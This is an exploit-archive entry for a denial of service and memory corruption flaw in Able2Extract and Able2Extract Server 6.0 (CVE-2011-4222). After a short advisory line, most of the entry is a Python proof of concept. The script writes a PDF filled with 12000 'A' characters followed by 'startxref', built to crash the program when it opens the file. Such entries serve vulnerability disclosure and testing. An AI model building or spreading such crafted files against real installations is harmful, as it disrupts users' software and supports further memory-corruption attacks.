Able2Extract and Able2Extract server version 6.0 suffers from a denial of service vulnerability.
ab32292905312ba912de21c5e6dc97b63078bc9aba3c2d7e2bb0d20ef3ff08fb
# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()